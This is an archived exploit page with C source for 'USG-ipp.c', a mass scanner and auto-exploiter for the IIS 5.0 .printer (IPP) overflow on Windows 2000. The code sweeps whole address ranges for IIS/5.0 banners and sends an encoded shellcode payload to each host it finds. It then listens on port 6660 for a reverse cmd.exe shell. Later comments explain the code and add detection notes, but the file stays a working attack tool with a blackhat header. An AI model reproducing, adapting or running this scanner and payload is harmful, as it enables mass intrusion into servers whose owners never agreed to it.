
USG-ipp.c

USG-ipp.c
Posted Mar 13, 2003
Authored by USG | Site usg.org.uk

IIS 5.0 / Windows 2000 mass scanner / rooter that spawns a shell from a vulnerable system back to the machine from which the attack is launched.

tags | exploit, shell
systems | windows
SHA-256 | 24f0ee8484f067e1f4b58579af1d7deca6ff9ef430a2ae999a08629bbc3e11c1

USG-ipp.c

/*
mass IPP by rD of USG
fuck all you ./hack scriptkiddies
fuck all ./juno kids
greetz to my brother bobbyd1gital of FBH
ain't no one online like bobby to me!
ain't no one like Cc0d3r to me IRL
Inkubus stop posting advisories we are fucken blackhats not some brainwashed whitehats security industry slaves
shouts to v0id, NtWaK0, scut,c1sco, PHC and all the blackhats
the rap shit is eating my mind

rD of USG (UNIX Security Guards)
usg@africamail.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>

#include <arpa/inet.h>
#include <sys/errno.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

extern int errno; /* redundant with <errno.h>, which already declares errno */

#define LOCAL_IP "192.168.0.1" /* put your real ip here if you want to get the shell else you won't */
#define TIMEOUT 3 /* seconds try() waits in select() for the probe connect to complete */
#define SHELL_TIMEOUT 6 /* seconds shell() waits in select() before giving up on the connect-back */
#define BANNER "Microsoft-IIS/5.0" /* substring of the Server: header that makes try() call jill() */
#define SEND "HEAD / HTTP/1.0\r\n\r\n\r\n" /* probe request; try() sends sizeof(SEND) bytes, i.e. the NUL too */
char server[500]; /* receive buffer for the probe response (try()) */
char *result; /* points at "Server:" inside server[] after a successful probe */


void usage(char *);
void try(char *);
int jill(char *, char *);
static int i,x,y,z; /* i: getopt() result in main(); x,y,z: octet counters for A/B/C sweeps */
char A(char *);
char B(char *);
char C(char *);
char D(char *); /* declared only -- no definition of D appears in this file */
static char a[4],b[8],c[12],ip[17]; /* option prefixes (-a/-b/-c) and the dotted quad being probed; ip fits "255.255.255.255" */
void shell(void);
/* main */

/*
 * Entry point.  Prints a banner, requires exactly one option with its
 * argument (argc must be 3), then dispatches on that option: -a/-b/-c copy
 * an address prefix into a fixed global buffer and start a sweep via
 * A()/B()/C(); -d probes a single address via try().
 *
 * argc/argv: standard command-line arguments.
 * Returns: no explicit return value (falls off the end); exit(-1) on a
 * usage error.
 */
int main(int argc,char *argv[])
{

fprintf(stdout,"\n\n\t\t mass IPP for IIS/5.0 by rD\n\n");
/* exactly one "-x value" pair is accepted */
if(argc != 3)
{
usage(argv[0]);
exit(-1);
}



/* i is the file-scope static int; note the optstring contains no 'h' */
while ((i = getopt (argc, argv, ":a:b:c:d:")) != EOF)
{
switch(i)
{

/* unreachable: getopt() cannot return 'h' for the optstring above */
case 'h': usage(argv[1]);
break;

/* -a: first octet; a[4] holds at most 3 characters, so A()'s own
 * length check can never fire after this copy */
case 'a':
snprintf(a,sizeof(a),"%s",optarg);
A(a);
break;

/* -b: first two octets ("x.x"), copied into b[8] */
case 'b': snprintf(b,sizeof(b),"%s",optarg);
B(b);
break;

/* -c: first three octets ("x.x.x"), copied into c[12] */
case 'c': snprintf(c,sizeof(c),"%s",optarg);
C(c);
break;

/* -d: probe one host; try() parses it with inet_addr(), so a dotted
 * quad is expected even though usage() says <hostname> */
case 'd':try(optarg);
break;
}

}

}

/* end of main */

/* A */
/*
 * Sweep every address under a one-octet prefix: builds "Aclass.X.Y.Z" for
 * X, Y, Z in 0..255 into the global ip[] buffer and passes each to try().
 * Uses the file-scope counters x, y, z.
 *
 * Aclass: first octet as a string; longer than 3 characters prints
 *         "wrong range" and exits.
 * Declared to return char but contains no return statement; main()
 * ignores the value.
 */
char A(char *Aclass)
{

if(strlen(Aclass)>3)
{
printf("wrong range");
exit(-1);
}

for(x=0;x<=255;++x)
{
for(y=0;y<=255;++y)
{
for(z=0;z<=255;++z)
{
/* ip[17] fits "255.255.255.255" plus the terminator */
snprintf(ip,sizeof(ip),"%s.%d.%d.%d",Aclass,x,y,z);
/* no newline: try() prints the outcome on the same line */
printf("trying %s\t->\t",ip);
try(ip);
}
}
}

}

/* end of A */



/* B */
/*
 * Sweep every address under a two-octet prefix: builds "Bclass.Y.Z" for
 * Y, Z in 0..255 into the global ip[] buffer and passes each to try().
 * Uses the file-scope counters y, z.
 *
 * Bclass: first two octets as a string ("x.x"); not length-checked here
 *         (main() already truncated it to fit b[8]).
 * Declared to return char but contains no return statement; main()
 * ignores the value.
 */
char B(char *Bclass)
{
for(y=0;y<=255;++y)
{
for(z=0;z<=255;++z)
{
snprintf(ip,sizeof(ip),"%s.%d.%d",Bclass,y,z);
/* no newline: try() prints the outcome on the same line */
printf("trying %s\t->\t",ip);
try(ip);

}


}


}

/* end of B */


/* C */
/*
 * Sweep every address under a three-octet prefix: builds "Cclass.Z" for
 * Z in 0..255 into the global ip[] buffer and passes each to try().
 * Uses the file-scope counter z.
 *
 * Cclass: first three octets as a string ("x.x.x"); not length-checked
 *         here (main() already truncated it to fit c[12]).
 * Declared to return char but contains no return statement; main()
 * ignores the value.
 */
char C(char *Cclass)
{
for(z=0;z<=255;++z)
{
/* compares the ip[] left over from the previous iteration against ".4";
 * that can only match with an empty Cclass and z == 4 -- intent unclear,
 * TODO confirm */
if( !strcmp(ip,".4") ) exit(EXIT_FAILURE);
snprintf(ip,sizeof(ip),"%s.%d",Cclass,z);
/* no newline: try() prints the outcome on the same line */
printf("trying %s\t->\t",ip);
try(ip);


}

}

/* end of C */


/* try */

/*
 * Probe one host on TCP/80 and fingerprint it.  Does a non-blocking
 * connect bounded by TIMEOUT seconds via select(), sends the SEND probe,
 * reads a single response into the global server[] buffer, isolates the
 * "Server:" header line, and calls jill(IP, LOCAL_IP) when that line
 * contains BANNER.  Every failure path prints a message and returns;
 * the socket is only closed on the two success paths at the bottom.
 *
 * IP: dotted-quad string; parsed with inet_addr(), so hostnames are not
 *     resolved here.
 * Detection note: on the probed web server this appears as a
 * "HEAD / HTTP/1.0" request with no Host header, followed by one NUL
 * byte (sizeof(SEND) counts the string terminator).
 */
void try(char *IP)
{
int sock,errex;
int numbytes = 0 , opt;
struct sockaddr_in remote;
fd_set wset;
struct timeval tv;

/* sock has not been assigned yet at this point */
close(sock);
sock = socket(AF_INET,SOCK_STREAM,0);
remote.sin_port = htons(80);
remote.sin_addr.s_addr = inet_addr(IP);
remote.sin_family= AF_INET;
memset(remote.sin_zero,0,sizeof(remote.sin_zero));

/* the "trying ..." line from the caller has no newline; push it out
 * before the connect may stall */
fflush(stdout);
if (sock == -1)
{
perror("socket creation error");
return;
}
FD_ZERO( &wset );
FD_SET( sock , &wset );
tv.tv_sec = TIMEOUT;
tv.tv_usec = 0;

/* non-blocking so the connect can be bounded by select() below */
if( fcntl( sock , F_SETFL , O_NONBLOCK ) == -1 )
{
perror("fcntl error");
return;
}

errex = connect(sock,(struct sockaddr *)&remote,sizeof(struct sockaddr));

/* only errno is examined; errex itself is never read, and errno is not
 * reset before the call */
if( errno != EINPROGRESS && errno != EISCONN )
{
perror("connection error");
return;
}

/* wait up to TIMEOUT seconds for the socket to become writable */
opt = select(sock+1,NULL,&wset,NULL,&tv);

/* back to blocking mode for the send/recv that follow */
if( fcntl( sock , F_SETFL , 0 ) == -1 )
{
perror("fcntl error");
return;
}

if( opt == -1 )
{
perror("select error");
return;
}
if( !opt )
{
printf("connection timed out..\n");
return;
}

/* sizeof(SEND) includes the terminating NUL, so one extra byte is sent */
numbytes = send(sock,SEND,sizeof(SEND),0);
if( numbytes == -1 )
{
perror("connection error");
return;
}
/* single read; server[] is 500 bytes and a full read leaves no room for
 * the terminator written on the next line */
numbytes = recv(sock,server,sizeof(server),0);
if( numbytes == -1 )
{
perror("recv");
return;
}

server[numbytes]='\0';
if(strlen(server) == 0)
{
printf("connection closed\n");
return;
}
result = strstr(server,"Server:");
if( result == NULL)
{
printf("no server string found\n");
return;

}
/* truncate at end of the header line; strchr()'s result is not checked,
 * so a response without a newline after "Server:" dereferences NULL */
*(strchr(result, '\n')) = '\0';
printf("%s\n",result);

/* the else branch below is the exact negation of this test; the two
 * exits differ only in whether "exploiting ..." is printed first */
if(strstr(result,BANNER) != NULL)
{
printf("exploiting ...\n");
jill(IP, LOCAL_IP);
}
else
if(strstr(result,BANNER) == NULL)
{
close(sock);
return;
}
close(sock);
}
/* end of try */




/* jill */

int jill(char *victim, char *attacker)
{

#define aport 6660

unsigned char sploit[]=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";

int s;
unsigned short int a_port;
unsigned long a_host;
struct hostent *ht;
struct sockaddr_in sin;



if ((ht = gethostbyname(victim)) == NULL){
hstrerror(h_errno);
}

sin.sin_port = htons(80);
a_port = htons(aport);
a_port^=0x9595;

sin.sin_family = AF_INET;
sin.sin_addr = *((struct in_addr *)ht->h_addr);

if ((ht = gethostbyname(attacker)) == 0){
herror(attacker);
return;
}

a_host = *((unsigned long *)ht->h_addr);
a_host^=0x95959595;

sploit[441]= (a_port) & 0xff;
sploit[442]= (a_port >> 8) & 0xff;

sploit[446]= (a_host) & 0xff;
sploit[447]= (a_host >> 8) & 0xff;
sploit[448]= (a_host >> 16) & 0xff;
sploit[449]= (a_host >> 24) & 0xff;

if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
return;

}

printf("\nconnecting to %s\n",victim);

if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
perror("connect");
return;
}

write(s, sploit, strlen(sploit));
sleep (1);
close (s);

printf("shellcode excuted, waiting for shell...\n");
//call the shell here
shell();
return;
}

/* end of jill */




/* usage */

/*
 * Print the command-line synopsis to stderr.
 *
 * prog: program name (argv[0]) substituted into the first line.  The
 *       lines after the first are adjacent string literals joined by the
 *       compiler into one format string.
 */
void usage(char *prog)
{

fprintf(stderr, "usage %s <-a> xxx\n"
" <-b> xxx.xxx\n"
" <-c> xxx.xxx.xxx\n"
" <-d> <hostname>\n",prog);

}
/* end of usage */

/* start of shell */
/*
 * Connect-back handler.  Binds TCP/6660 on all local interfaces
 * (INADDR_ANY), waits up to SHELL_TIMEOUT seconds for an inbound
 * connection, then relays lines between stdin and the accepted socket
 * until an error occurs.  All failure paths print a message and return;
 * the sockets are only closed explicitly on the timeout path.
 *
 * Nothing is spawned locally: the "Spawning cmd.exe" message refers to
 * the remote side.
 * Detection note: the host running this tool opens an unusual listener on
 * port 6660 and the probed system makes an outbound TCP connection to it.
 */
void shell()
{


int recvsock , newsock , numbytes , size , opt;
char recvbuffer[2048];
fd_set rs , rsmaster , wset;
struct sockaddr_in local,incomming;
struct timeval tv;

/* address length for accept(); an int, not socklen_t */
size = sizeof( struct sockaddr );

recvsock = socket(AF_INET , SOCK_STREAM , 0 );
if( recvsock == -1 )
{
perror("socket creation error");
return;
}

local.sin_addr.s_addr = INADDR_ANY;
local.sin_port = htons(6660);
local.sin_family = AF_INET;
memset( local.sin_zero , 0 , sizeof(local.sin_zero) );

if( ( bind(recvsock , (struct sockaddr *)&local , sizeof(struct sockaddr) )
) == -1 )
{
perror("bind error");
return;
}

if( listen(recvsock , 10 ) == -1 )
{
perror("listen error");
return;
}

FD_ZERO( &rsmaster );
FD_ZERO( &wset );

/* wset is populated here but never passed to a select() call */
FD_SET( recvsock , &wset );
tv.tv_sec = SHELL_TIMEOUT;
tv.tv_usec = 0;

/* non-blocking listener so accept() returns immediately */
if( fcntl( recvsock , F_SETFL , O_NONBLOCK ) == -1 )
{
perror("fcntl error");
return;
}
newsock = accept( recvsock , (struct sockaddr *)&incomming , &size);
/* bounded wait of SHELL_TIMEOUT seconds on rsmaster (still empty here) */
opt = select( recvsock+1 , &rsmaster , NULL , NULL , &tv );

if( opt == -1 )
{
perror("select error");
return;
}

/* timeout: nothing connected back */
if( !opt )
{
printf("damn it's patched!\n");
close(newsock);
close(recvsock);
return;
}

/* listener back to blocking mode */
if( fcntl( recvsock , F_SETFL , 0 ) == -1 )
{
perror("fcntl error");
return;
}
/* incomming is only valid if the accept() above succeeded, which is
 * checked just after these two messages */
printf("Incomming connection from %s\n",inet_ntoa(incomming.sin_addr));
printf("Spawning cmd.exe\n\n");
if( newsock == -1 )
{
perror("accept error");
return;
}


/* relay loop: stdin -> socket, socket -> stdout, until an error */
while(1)
{
rs = rsmaster;

FD_SET( newsock , &rsmaster );
FD_SET( 0 , &rsmaster );

/* no timeout: blocks until one of the watched descriptors is readable */
opt = select( newsock + 1 , &rs , NULL , NULL , NULL );

if( opt == -1 )
{
perror("select error");
return;
}

if( FD_ISSET( 0 , &rs ) )
{
/* fgets() result is not checked; the snprintf() below uses recvbuffer as
 * both source and destination (overlapping) to append "\r\n" */
fgets(recvbuffer,sizeof(recvbuffer)-1,stdin);
snprintf(recvbuffer,sizeof(recvbuffer),"%s\r\n",recvbuffer);
numbytes = send(newsock , recvbuffer , strlen(recvbuffer) , 0);
if( numbytes == -1 )
{
perror("send error");
return;
}
}

else if( FD_ISSET( newsock , &rs ) )
{
numbytes = recv( newsock , recvbuffer , sizeof(recvbuffer) - 1 , 0 );
if( numbytes == -1 )
{
perror("recv error");
return;
}
/* the last two received bytes are replaced by "\n" and a terminator;
 * assumes at least two bytes were received (numbytes >= 2) */
recvbuffer[numbytes-2] = '\n';
recvbuffer[numbytes-1] = 0x0;
printf("%s",recvbuffer);
}

}

}
/* end of shell */

/* EOF */
